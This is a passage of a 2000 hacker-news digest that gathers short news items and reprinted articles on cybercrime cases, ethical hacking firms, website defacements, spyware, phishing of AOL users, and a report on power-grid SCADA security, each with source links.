222.0 [HNN] June 26'00 Traditional Hackers Upset Over Use of Term
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Code Kid

Hacker, cracker, criminal, we have heard it all before, but for some reason this angle still gets press. Hackers are upset about the use of the term 'hacker' to describe criminals.

(Yawn, now there is up to the minute reporting for you.)

Australian Financial Review
http://www.afr.com.au/reports/20000620/A19851-2000Jun19.html

@HWA

223.0 [HNN] June 27'00 Oracle Admits to Spying on Microsoft
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by ted

The second largest software company in the world has admitted that it hired a detective agency to investigate the allies of the largest software company in the world. In a statement released yesterday Oracle admitted that it hired Investigative Group International Inc. to expose certain industry trade groups as puppets of Microsoft.

Wall Street Journal
http://interactive.wsj.com/articles/SB962146554881934536.htm

The Register UK
http://www.theregister.co.uk/content/1/11637.html

@HWA

224.0 [HNN] June 27'00 FBI To Investigate Stages Worm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Apocalyse Dow

After 12 days the Stages worm has caused many headaches for administrators and ISPs. The FBI has announced that they are now starting an investigation into who and where the worm came from. Initially they believe that the virus/worm originated in Argentina. When the virus/worm is triggered, it appears to activate links to pornographic sites and changes the home page of the victims' Internet Explorer browser to a porn site.
Newsbytes
http://www.newsbytes.com/pubNews/00/151173.html

Stages - via Computer Associates
http://www.ca.com/virusinfo/

@HWA

225.0 [HNN] June 27'00 Mattel Will Remove Spyware
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Renderman

Mattel has announced that they will be releasing a tool to uninstall spyware included with many of their children's titles such as 'Reader Rabbit', 'Arthur' and 'Little Bear'. The software, known as "Broadcast," would send a product identification number and some technical information to Mattel and then download advertising for products targeted at the user. Strangely enough this spyware does not fall under COPPA because Mattel is not a web-site or on-line service; however, Mattel decided to stop using the software anyway.

(Well, that's mighty nice of them.)

ABC News
url vanished!

@HWA

226.0 [HNN] June 27'00 Russia Accuses Lithuanian of Hacking For The US
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Jonas.Bijunas

Russia's FSB domestic security service said on Monday it had exposed and detained a Lithuanian on charges he spied for the United States by breaking into its computer systems. The FSB claimed that the spy admitted to the acts and that the goal was to penetrate information systems to determine their structure and defensive measures, and to create holes for later use.

Reuters - via AltaVista Live
http://live.altavista.com/scripts/editorial.dll?ei

@HWA

227.0 [HNN] June 27'00 BSA Settles With 20 Companies
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Apocalyse Dow

The Business Software Alliance has announced 20 settlements with companies it found to be copying programs or using unlicensed copies. The settlements will result in more than $2.4 million in fines to be paid to BSA. Details of the settlements will be made over the next week.
(Milk it for all it's worth)

ABC News
http://abcnews.go.com/sections/tech/DailyNews/piracy000627.html

e-commerce Times
http://www.ecommercetimes.com/news/articles2000/000627-5.shtml

@HWA

228.0 [HNN] June 27'00 UAE Telecom Firm Will Prosecute
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Code Kid

United Arab Emirates telecommunications firm Etisalat has vowed to prosecute anyone who abuses the country's Internet system. Lee Alan Ashurst, 21, of Manchester, England, who is suspected by Etisalat officials of breaking into the systems and causing service disruptions earlier this month, has denied the accusations and said he had filed lawsuits for defamation and damages against Etisalat.

Reuters - Yahoo
http://dailynews.yahoo.com/h/nm/20000628/wr/emirates_hacker_dc_2.html

@HWA

230.0 [IND] UK: White-hat Hacker Engaged In Black Arts
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 23 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_052300a_j.shtml

5/23/00 UK: White-hat Hacker Engaged In Black Arts

MICK is an ethical hacker. There is not much more we can say about him, not even his real name, except that he lives in the UK and is a frontline fighter in the escalating war against cybercrime. Mick is employed by IBM Global Services as a "white-hat" hacker.
His days are spent trying to break into the computer networks of IBM's clients, either remotely on the Internet or in disguise by infiltrating the client's building and hacking into the computer system on site. Only one person within the target organisation, usually a senior executive, will know Mick's identity. He is armed with a waiver from prosecution should the mission be successful in exposing flaws in a company's computer security. Mick says he used to write security products, such as fire walls for keeping intruders and viruses out of companies' computer networks, before moving on to IBM's ethical hacker team. "IBM thought it would be good to have somebody who makes security, break security," he says. Mick says his work is vital in protecting companies, and ultimately their customers, from cybercrimes such as viruses, the distributed denial of service (DDOS) attacks that hit Yahoo! and other Internet sites earlier this year and credit card fraud. His enemies range from kids messing about with virus-writing tools available over the Internet to disgruntled employees and seriously intelligent "black hat hackers" out to do maximum damage to a company through its computers. The FBI and Interpol have identified a growing trend in unethical companies and countries employing black-hat hackers to damage rival companies and even countries. "There is definitely information warfare going on," Mick says. One of the biggest problems faced by providers of computer security services is an understandable reluctance on the part of companies to admit their security flaws or report breaches. Mick says that the DDOS attacks and this month's ILOVEYOU virus, which both cost industry billions of pounds, have raised awareness and budgets for computer security. Mick says UK companies must embrace computer security by putting comprehensive policies in place and regularly updating and testing defences. "In the US, security has a great profile from CEO down to the cleaner," he says. 
"The UK has a lot to learn, but it is learning very fast." Jonathon Fornaci, chief executive of AtomicTangerine, an Internet consultancy firm spun out of the Stanford Research Institute, says computer security is "critical" as companies embrace e-business. He says governments around the world are tackling the problem, but have admitted that they are virtually powerless to protect companies and consumers from cybercrime. He says it is up to companies to protect themselves. Mick agrees: "There is a limit to what the Government can do. You can't spend hundreds of thousands of pounds of resources to catch somebody who's doing minimal damage. You don't take the whole Hampshire police force to track down a jaywalker." Fornaci believes that companies also share a "social and moral obligation" to employ sound computer security systems because of the trend for hackers and virus writers to use companies' websites as staging posts for attacks on other companies. By Clive Mathieson. (c) Times Newspapers Ltd, 2000. THE TIMES 20/05/2000 P31 @HWA 231.0 [IND] India: Licensed To Bill - `Ethical Hackers' Get Paid To Crack E-security. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 23 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_052300b_j.shtml 5/23/00 India: Licensed To Bill - `Ethical Hackers' Get Paid To Crack E-security. MUMBAI: A new breed of hackers is on the loose. They are not the ones who have been giving corporate IT managers nightmares so far - - teenagers sitting in some dark room, attacking corporate computer systems or stealing vital data. The new species carries a valid `double oh' license. They are fully authorised to hack into companies, ranging from banks to e-commerce organisations. Reason? To thoroughly check system security and plug relevant problems. 
Many of them are pioneers in a shadowy business that may seem more like a scene from the Hollywood blockbuster `The Net,' where Sandra Bullock falls victim to a group of expert computer hackers, than reality. Global professional services firm Ernst & Young actually gets paid for hiring out their `ethical hackers' to large companies, mostly in the banking, insurance, B2B and B2C arenas.

With the proliferation of dotcoms here, the scene is merely warming up, with the web becoming an even more attractive playground for hackers. Mushrooming e-commerce has meant an increasing volume of sensitive data, especially financial data, getting transferred over the Internet. As a result, a hacker attack is no longer a mere annoyance for companies. It could lead to major financial loss.

"75 per cent of the hacking that we encounter is from within the same organisation that we are employed to check," states Ernst & Young (E&Y) national director Sunil Chandiramani. "That is a frightening statistic," he adds. A member of the Cybercop committee of the NASSCOM, Mr Chandiramani is also in the working committee of the Securities and Exchange Board of India (SEBI) on Internet trading surveillance and enforcement related issues.

Says Mr Chandiramani: "Most times, we can get into nine of the 10 companies via the Internet and then come back with some souvenir to show that we were there."

E&Y's `eXtreme hacking' is a cutting edge tool and methodology adopted by the firm to defend sites and provide the necessary security solutions. The firm also conducts training sessions to enable corporates to double-check their security systems and familiarise them with the network-based attack and penetration exploits that hackers may use against their networks. Providing security solutions for a complex world may not be an easy task, for it is necessary to assess, architect and implement solutions to protect vital information resources.

Hackers have gained prominence for their ability to penetrate hard-to-crack computer centres by exposing an unnoticed vulnerability or by making a clear anti-authority statement and even, in some cases, re-designing the front page of the web site.

As for the kind of perpetrators? According to a global information security survey conducted by E&Y, 24.8 per cent of the threats facing organisations today come from hackers and 13.9 per cent of the hacking incidents are actuated by competitors. While 7.5 per cent are authorised users of the system, an equally high number of 6.2 per cent are contract workers and consultants. Unauthorised users account for 20.8 per cent of cyber crimes, the survey points out.

Though security concerns are "very new here (in India)" with e-commerce merely testing the waters, attacks on high profile databases are on the increase and are expected to bring to the boil a $4 billion content security market in the next couple of years, according to industry estimates.

As Mr Chandiramani states, "We don't just go to the firewall and prove that we can break in, but we go into the main computers itself. At times, we deploy staff to get into the EPBX system to get telephone numbers," he said, adding, "it is not hard to convince companies of their security loopholes once we have managed to hack into their system."

That is not to say that companies have not deployed solutions to counter hacking. Among several corporate houses, Unilever has corporate IT security policies and standards that are applied around the globe, both within the organisation and with their close business associates. ICICI, too, has an established security organisation structure and has developed IT security policy and procedures which are in place. While Hindustan Lever Limited undertakes regular attack and penetration testing, Sprint RPG India Limited has developed policies and procedures for maximising the effectiveness of their IT processes.

With borderless transactions getting to be the norm, India will be as vulnerable as any other country to intrusions of this nature. Moreover, with electronic records becoming legally acceptable, there is a growing threat that companies could stand to lose valuable information if adequate care is not taken of the health of the media on which the records are stored.

By Amrita Nair-Ghaswalla. (c) 2000 The Times of India Group.
TIMES OF INDIA 20/05/2000

@HWA

232.0 [IND] Hackers Shoot, Score On NHL Web Site
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 25 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_052500a_j.shtml

5/25/00 Hackers Shoot, Score On NHL Web Site

By Martin Stone, Newsbytes

NEW YORK, NEW YORK, U.S.A., 25 May 2000, 6:47 AM CST

Officials of the National Hockey League (NHL) and FBI investigators are reportedly attempting to find the culprit or culprits who disabled the league's official Web site in the midst of the Stanley Cup playoffs.

An Associated Press report today said it remained uncertain whether hackers cross-checked the site at http://www.NHL.com on Sunday with a Distributed Denial of Service (DDoS) attack, but the results seem similar to the so-called "smurf" invasions that brought down Yahoo, eBay, eTrade, CNN, Amazon.com and other sites in February.

The league said it had filed a formal complaint with the FBI in addition to seeking help from security firms to track down the hackers. A league official told AP, "Someone was flooding the pipeline with bogus requests through distributed PCs. The whole system was overloaded. But the intranet was not compromised," he said, referring to the NHL's internal Web network.

The spokesman confirmed the site is still experiencing "spotty service", the report said.
@HWA

233.0 [IND] Computer whiz alters high school's grades
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

May 25 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_052500b_j.shtml

5/25/00 Computer Whiz Alters High School's Grades

Associated Press - POCATELLO, Idaho -- Someone allegedly hacked into the computer system at Highland High School and changed students' grades.
http://www.spokane.net:80/news-story-body.asp?Date=052000&ID=s804878&cat=

"We've had some computer espionage from students," Pocatello School District technology coordinator Bob England said Thursday. "Altering grades. I believe the police are dealing with it."

England said the hacker used the district network and software, somehow copied teachers' passwords and logged onto the system.

Highland Principal Jeff Taylor said disciplinary action would be taken and that administrators were "treating it as a serious action against school policy."

@HWA

234.0 [HNN] Jun 29'00 Australian Tax Office Allegedly Compromised
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by David

Australian Federal Police have identified who they say is the person who stole confidential details of thousands of businesses from a government GST website. Several Australian businesses reported getting strange anonymous emails that contained business phone and fax numbers as well as bank account details. The site was set up to allow companies to submit their banking details and other information to become accredited suppliers of GST information and assistance packages. The perpetrator told a reporter that he didn't hack or crack into the server; he stumbled upon the information while surfing, due to a complete lack of security. He thought he should tell the companies involved, which is why he sent the email. The security hole has been blamed on a poorly designed CGI script.

The Age
news.com.au
ZD Net Australian
Fairfax IT
Sydney Morning Herald
http://www.theage.com.au/breaking/0006/29/A40793-2000Jun29.shtml
http://www.news.com.au/common/story_page/0,4057,871934%255E2,00.html
http://www.zdnet.com.au/zdnn/stories/zdnn_display/au0003700.html
http://www.it.fairfax.com.au/breaking/20000629/A40837-2000Jun29.html
http://www.smh.com.au/news/0006/29/update/news11.html

@HWA

235.0 [HNN] Jun 29'00 AOL Tells FCC That IM Security Is Top Priority
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

In response to the Federal Communications Commission's inquiry on instant messaging, AOL said it supports the interoperability of instant messaging (IM) software but that it must make the privacy and security of instant messages the company's top priority until standards can be developed.

Reuters - via Yahoo
http://dailynews.yahoo.com/h/nm/20000627/en/online-messaging_1.html

@HWA

236.0 [HNN] Jun 29'00 McCain Still Pushing for Filtering
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

The Arizona Republican Senator John McCain is still pushing for content filtering at the nation's public libraries. He has added an amendment onto the Labor appropriations bill that requires schools and libraries receiving E-rate funding to use filters to block Internet content that is "inappropriate for minors."

Wired
Summary & Status of S. 3635
http://www.wired.com/news/politics/0,1283,37259,00.html
http://thomas.loc.gov/cgi-bin/bdquery/z?d106:SP03635:

@HWA

237.0 [HNN] Jun 29'00 Lawsuit Filed Over Nike Redirection
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Weld Pond

When Nike's website was redirected by attackers last week it routed the traffic through a small web hosting company. That company is now suing Nike, claiming it was negligent in securing its systems. Nike says that if anyone is to blame it is Network Solutions, who allowed the redirection to occur in the first place. The perpetrator of the redirection remains unidentified. (Regardless of how this case is decided it will set an interesting precedent either way.)

Wired
http://www.wired.com/news/politics/0,1283,37286,00.html

@HWA

238.0 [HNN] Jun 29'00 eCrime Documentary
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

The story of Tim Lloyd, accused and convicted of deleting files and thereby destroying the business of his employer, is laid out in a blow by blow fashion in the article. We have reported on Lloyd before and described how he has been found guilty of industrial sabotage of Omega Engineering Corp. Now there is a step by step account of how the Secret Service got their man.

CNN
http://www.cnn.com/2000/TECH/computing/06/27/omega.files.idg/index.html

@HWA

239.0 [HNN] Jun 29'00 E-mail Used As Evidence In Korea
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Evil Wench

Officials at the Seoul District Prosecutor's Office said they arrested 32-year-old Kim Sang-hoon, a computer software developer, on charges of violating a law governing information-telecommunications networks. Kim allegedly stole some 4,600 files from a Web-hosting firm's server. One of the witnesses in the case was allowed to send his testimony to the court via email.

Korea Herald
http://www.koreaherald.co.kr/news/2000/06/__02/20000629_0213.htm

@HWA

240.0 [HNN] Jun 30'00 AOL Users Subjected to Social Engineering
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by William Knowles

Two 15-year-olds in Wichita, Kansas allegedly tricked some AOL users into revealing credit card numbers. Victims received an e-mail from "Steve Case" of the "AOL Billing Team" requesting that they go to a web site to update their user information. The requested information included providing a credit card number "that has not been used for any AOL services," the message read. Steve Case, of course, is not a member of any billing teams but rather is AOL's president and CEO. An AOL official said that the company never asks for users' passwords or credit card numbers.

APB News
http://www.apbnews.com/newscenter/breakingnews/2000/06/29/aolscam0629_01.html

@HWA

241.0 [HNN] Jun 30'00 ZDNet Launches Echelon Study
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Pyle

In a series of articles by Duncan Campbell and other contributors, ZDNet is taking a closer look at the Echelon global spying network. "Echelon: World Under Watch" is a collection of 16 reports that include such topics as proof of Echelon's existence, an explanation of how Echelon works, and various attempts by governments to maintain the secrecy of the project. Public awareness of such far-reaching government snooping capabilities could lead to further efforts by citizens to protect their privacy.

ZDNet
http://www.zdnet.co.uk/news/specials/2000/06/echelon/

@HWA

242.0 [HNN] Jun 30'00 Interpol and Atomic Tangerine Announce Collaboration
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Weld Pond

U.S. venture consulting firm Atomic Tangerine has established a cooperative agreement with Interpol to exchange intelligence on cybercrime. Atomic Tangerine proposes to pass along Interpol's intelligence to any bona fide company free of charge. In exchange, Interpol will have access to information gathered by Atomic Tangerine's "Net Radar."

Reuters - via Excite
http://news.excite.com/news/r/000629/15/net-security-dc

@HWA

243.0 [HNN] Jun 30'00 Survey Results Show That Precautions Lag Concerns
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Apocalypse Dow

Consumers and professionals alike are plenty concerned about being victimized by cybercrime, but only a fraction of them use firewalls on their personal computers. Many people surveyed update their antivirus software at least once per month but generally fail to take further precautions. (Why not install a firewall or learn about security before starting a business?)

Newsbytes.com
http://www.newsbytes.com/pubNews/00/151446.html

@HWA

244.0 [HNN] Jun 30'00 Student Confesses to Numerous Private and Government Attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by William Knowles

A former computer science student at Northeastern University admitted to computer break-ins at the Defense Logistics Agency, NASA, and the Interior Department among others. The federal prosecutor in the case sought a harsh penalty as discouragement to other such crimes, but under a plea agreement the man will serve a maximum of six months.

AP - via Techserver
http://www.techserver.com/noframes/story/0,2294,500222509-500318460-501790855-0,00.html

@HWA

245.0 [HNN] Jun 30'00 Threat From Russia?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

contributed by Pyle

A Thursday New York Times article describes the bleak employment scene in Russia as a perfect breeding ground for cyber-criminals. In a profile of one bored Russian teenager, "Dr. Linux," the article describes instances of internet petty crime as part of a growing interest among Russians with an interest in computers and a lot of free time. Numerous Russians interviewed claimed that the media have exaggerated the importance of recent Russian attacks as part of a "cold war mentality."

New York Times - registration required (free)
http://www10.nytimes.com/library/tech/00/06/circuits/articles/29hack.html

@HWA

246.0 [HNN] Jun 30'00 Zines Update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

b0g issue 6 just released!
NOV - Issue 9 is out now and still going strong.

b0g
http://www.b0g.org/

@HWA

247.0 [IND] May 26th: Lights Out
~~~~~~~~~~~~~~~~~~~~~~~~~~

May 26 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_052600a_j.shtml

5/26/00 Lights Out

A year in the making, NIPC's Michael Vatis unveils a plan to monitor cyber attacks on the power grid. Is it enough to prevent a blackout?
By Kevin Poulsen
May 25, 2000 11:36 PM PT

The FBI's National Infrastructure Protection Center (NIPC) will be the hub of a nationwide alert network designed to react quickly against cyber attacks targeting the computerized controls of the North American power grid, in a pilot program announced by NIPC chief Michael Vatis to a Senate committee Thursday.

Vatis unveiled the "Electrical Power Indications and Warning System" in his written testimony to the full Senate Judiciary committee as it conducted a hearing on cybercrime. "Under the pilot program, electric utility companies and other power entities transmit cyber incident reports to the NIPC," Vatis testified. "These reports are analyzed and assessed to determine whether an NIPC warning, alert, or advisory is warranted to the electric utility community."

More>> http://www.securityfocus.com/news/41

The FBI established the program in concert with the North American Electrical Reliability Council (NERC), a not-for-profit industry group that umbrellas electric utilities in the U.S. and Canada. "We've been working with NIPC over the past year, maybe a little longer, to develop the program," said Eugene F. Gorzelnik, NERC's communications director.

Gorzelnik said the program is being tested by one of the nine regional councils that make up NERC, but declined to say which one. "They've been working through some of the bugs, and we've had several utilities around the country volunteer to participate as well," Gorzelnik said.

NERC formed in the wake of the catastrophic November 9, 1965 blackout that knocked out power to 30 million people in the Northeastern United States and Ontario, Canada for as long as thirteen hours. Runway landing lights went dark, people were trapped in elevators, traffic snarled at busy intersections that were suddenly left without signals.

Decades before buzzwords like "critical infrastructure" and "cyberterrorism" would enter the vernacular, President Lyndon Johnson viewed the blackout as a national security matter and set the FBI and the Pentagon to investigate. Utility engineers eventually traced the genesis of the cascading outage to the failure of a single relay in a transmission line.

'Utility operations personnel interviewed believed that firewalls and dial-back modems were sufficient to protect their systems from intruders.'
-- White House report

Today, the "Great Northeast Blackout" influences the most popular cyberterror fears. The inevitable hacker-induced blackout goes with the hacker-induced 911 outage as a central doctrine for executive, congressional and industry believers who say that cyberterrorism is a serious and immediate threat to the Western World. National Security Council Terrorism Coordinator Richard Clarke put it this way to the New York Times: "You black out a city, people die. Black out lots of cities, lots of people die. It's as bad as being attacked by bombs."

Actual incidents of computer-based attacks against the power grid are hard to find. While the past two decades have seen no shortage of attacks on critical infrastructures -- including a hacker taking over an HBO broadcast through a communications satellite, a group trespassing into the computers controlling a Time Warner cable system, and intruders of all types routinely gaining influence over huge swaths of the telephone network -- tales of intrusions into electric utilities remain apocryphal.

An October Wall Street Journal report on the 1995 Dallas "Phone Masters" case included a casual paragraph-eight disclosure that the three hackers involved "had access to portions of the national power grid," but no such charges were filed against the defendants, who admitted to cracking telephone company computers, and the prosecutor on the case denies it. "I don't remember any example of them accessing the power grid," said former Assistant U.S. Attorney Matt Yarbrough, now with a Dallas law firm.

The electric industry is close-mouthed on the question. "When it comes to saying something specific about whether anything has happened on the electric system, I don't answer," said Gorzelnik. Asked to what degree the power grid is vulnerable to such an assault, Gorzelnik said, "I just won't answer that question. It's not something that we want to talk about in the press. It doesn't serve any useful purpose."

But a detailed 1997 report by the White House's National Security Telecommunications Advisory Committee paints a sobering picture.

Open Modems

The committee's Electric Power Risk Assessment was conducted at the request of President Clinton, and involved six months of investigation and interviews with workers at eight utilities and three industry groups, including NERC.

While the report concluded that physical destruction of electric facilities was a far greater threat than online attacks, it also described a power grid controlled by Byzantine systems riddled with basic security holes. Networks controlling critical portions of the grid were accessible through corporate LANs, the report said. Digital circuit breakers could be remotely tripped by anyone with the right phone number. Fixed passwords for remote vendor access went unchanged for years.

Of particular concern to the committee was the widespread use of unsecured supervisory control and data acquisition (SCADA) systems. The SCADA systems consist of central hosts that can monitor and control smaller Remote Terminal Units (RTUs) sprinkled throughout the grid, which in turn control power flow at any given point. Many RTUs in electrical substations were accessible through telephone dial-ups, some of which were protected only with dial-back systems -- modems that call a user back at a pre-programmed number before granting access -- while others lacked even that weak security mechanism and were accessible to anyone who found the telephone number. "An intruder could dial into this port and issue commands to the substation equipment," the report notes.

"Open sources, including... electric industry publications, regional maps, and the Internet would provide enough information to identify the most heavily loaded transmission lines and most critical substations in the power grid," reads the report. "Relatively simple hacking techniques could then be used to locate dial-in ports to these points and modify settings to trigger an outage."

Overall, the report found that utility workers "believed that firewalls and dial-back modems were sufficient to protect their systems from intruders, and they were surprised to learn about the experiences of the telecommunications industry with hackers defeating these measures."

An engineer with a company that manufactures SCADA systems in use at major electric utilities, speaking on condition that neither he nor his company be identified, said that in recent years the government has spurred electric utilities to increased security. But his company's SCADA products still include dial-up support, and the security features are identical to the ones criticized as weak in the 1997 report.

"You can have the remote unit call back to verify that the number is correct," he said. "There are security checks in many areas across the system, via protocols, via passwords... So I'd say it's safe. At least, it's not completely open."

"Everything you see in computer security is being applied here. There are utilities that deem it necessary and are applying it. Is every utility applying it? No. But at least [the government] is pushing to see that utilities do it," he said.

NERC's Gorzelnik wouldn't comment on whether the power grid is any more secure now than in 1997.

The Electrical Power Indications and Warning System does nothing to prevent attacks, but rather provides a channel for electric utilities to report attacks they detect directly to NIPC. "With the information NIPC receives, they'll be able to see if there's any kind of trend developing, to see if there's a more serious problem," said Gorzelnik. "They wouldn't just be looking at the power sector, but also banking, telecommunications and other infrastructure sectors" for signs of a coordinated attack, Gorzelnik said.

The program will go nationwide this fall, and in Thursday's testimony Vatis promised the Senate that it will be a model for similar programs to monitor intrusions into other critical infrastructures. "We are currently working with industry on an Indications and Warning model for the telecommunications sector."
@HWA 248.0 [IND] May 30th Anti-Metallica Hackers Hit DC Metro Web Site ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ May 30 2000 www.infowar.com http://www.infowar.com/hacker/00/hack_053000a_j.shtml 5/30/00 Anti-Metallica Hackers Hit DC Metro Web Site By Phuong Ly, Washington Post WASHINGTON, DC, U.S.A., 30 May 2000, 6:14 AM CST A computer hacker vandalized the DC Metro's Web site for at least five hours Monday by replacing transit information with an X-rated message lashing out at recording artists who have filed lawsuits to stop people from swapping music files over the Internet. The attack, the first for Metro, illustrated how vulnerable many public Internet sites have become to being exploited by vandals. Murray Jacobson, manager of Metro's information technology division, said that it was unclear how many users saw the obscene message but that the effect on Metro customers probably was minimal because it occurred on a holiday. On a typical weekday, Metro's Web site records about 200,000 visits, some from people accessing the site more than once, according to Cheryl Johnson, a Metro spokeswoman. The site includes a ride guide with maps to help people plan their commutes, and it also allows passengers to buy "smart cards" that store up to $200 in parking and fares. Jacobson said there appeared to be no security breach enabling the hacker to obtain credit card numbers. "It did not seem like they were out to destroy a computer system," Jacobson said. "They knew what they could get away with quickly." Metro transit police and D.C. police will investigate the incident, which also will be reported to the FBI, Jacobson said. Like many Web sites, Metro might have been hit simply because the hackers - whether youths fooling around on a home computer or people who wanted to make a political statement - thought the site could be disrupted, said Mark Rasch, a former federal prosecutor and security consultant with Reston-based Global Integrity. 
About 30 to 50 Web sites are hacked each week, he said. "It's just a site of opportunity," Rasch said of the attack on Metro. "Even if you're not doing anything particularly controversial with your Web site, it may be used to make a political statement." In February, some of the Web's most prominent sites - including Yahoo, eBay and Amazon.com - were paralyzed. In April, a 15-year-old Canadian computer whiz known online as "Mafiaboy" was the first person charged in those cyber-strikes. Metro's hackers identified themselves as "Idk2k," or "immortal daemon killers," and started their message with "welcome to the year of knowledge." They called the practice of vandalizing Web sites "lame" but necessary because musicians were suing Napster, a popular computer program that allows people to download music. The profanity-filled message berated the rapper Dr. Dre and the heavy metal band Metallica, who have sued Napster and have been particularly outspoken against the company. Recently, in chat rooms and message boards, hackers have been seething about the lawsuits, Rasch said. But no other attacks concerning Napster have been reported over the weekend, said representatives at the federally funded CERT Coordination Center at Carnegie Mellon University, which monitors hacker attacks and helps develop responses to them. Metro officials discovered that their site had been vandalized about 9:30 a.m. Monday and called in tech support staff to change passwords and restore the site, Jacobson said. By 3 p.m., Metro's site was running properly and the focus turned to finding the culprits and preventing another attack, Jacobson said. Yesterday, Jacobson tried to find a silver lining in the attack. "It's kind of good to know these things happen every once in a while," he said. "It educates our internal users because you know people out there are doing malicious attacks. It's never pleasant, but you want to prepare for the future." Copyright (C) 2000, The Washington Post. 
Reprinted with permission.

@HWA 249.0 [IND] June 1st Hackers Drawn By The Thrills, The Challenge or Just Plain Cash
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 1 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_060100a_j.shtml

6/01/00
Hackers Drawn By The Thrills, The Challenge or Just Plain Cash
Experts discuss motives behind cybercrimes
By David McHugh
Special for USA TODAY

MOSCOW -- Alexei of St. Petersburg cracked his first program when he was 12. Frustrated by a game he couldn't win on his parents' computer, which ran on an Intel 8086 microprocessor, he poked around in the game's programming to make it easier.

Now 20, the technical institute dropout cracks software to order for $50 to $200, defeating security measures, so illegal copies will run on additional computers. He charged one businessman $50 to crack a $3,000 program for automating embroidering machines.

His mother, with whom he lives, doesn't approve. ''So we try not to cross paths on this topic,'' he says.

Alexei, who declined to give his last name, swaps pirated software under his nickname, Spot, on closed Internet sites limited to members of his group, ScUM (''I forget what it stands for.''). He has never met most of the members in person. Cracking presents an intellectual pleasure, he says. ''A sporting interest, I would say.''

With many companies reluctant to hurt their reputation by reporting security breaches to police, private systems specialists often lead the uphill fight against hackers. One of them is Sergei Gruzdev, general director for Israeli-based Aladdin Software Security's Moscow office.

Gruzdev, who admits he wrote viruses in his student days, says he's shut down 35 Web sites where hackers were sharing cracked software and hacking tools. Usually, a call to the Internet provider supporting the site does the trick.

But Gruzdev sicced the police on the United Crackers League, a St. Petersburg-based group that had figured out how to defeat one of Aladdin's security devices. One of its members, Andrei Lishutin, known as Leshy (''Wood devil'' in Russian) was arrested. After that, the group renamed itself United Copyright Protection/Cryptography Labs and says it is now committed to fighting hackers.

Hackers, Gruzdev says, ''have the attitude (that) 'I don't want to pay $50 to Bill Gates or to Western bourgeois software developers.' It's the psychology of poor people.''

Some hackers use their skills to make money legally. Aladdin special projects manager Alexei Raevsky, 26, started out by cracking a program for fun when he was a freshman at Moscow's Institute of Physics and Engineering. A classmate handed him a software disk protected by a widely used security program, saying ''You're a hacker, hack this.''

Raevsky, who was writing programs in 10 computer languages by the time he left high school, studied the security measure ''to test my skills. I cracked it, naturally.''

Then he wrote the software maker in Germany, detailing the flaws. The firm responded by giving him contract work and a top-of-the-line laptop computer -- a luxury among Moscow students.

Now he drives a Volvo and owns his own apartment, an upper-middle-class standard of living. ''We have the American approach -- if you're so smart, where's your money?'' he says. ''Some waste time on breaking up Web sites, and my attitude is, why do that if there's no money in it?''

@HWA 250.0 [IND] Web Hijackers Pilfer Internet Domain Names
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 1 2000
www.infowar.com
http://www.infowar.com/hacker/00/hack_060100b_j.shtml

6/01/00
Web Hijackers Pilfer Internet Domain Names
By Ian Karleff

TORONTO (Reuters) - Cyberspace hijackers have stolen the Internet domain name Web.net, a hosting site for 700 charities, from its Canadian owners, exposing yet another of the Internet's security flaws and jeopardizing the Web's most valuable property -- your e-identity.

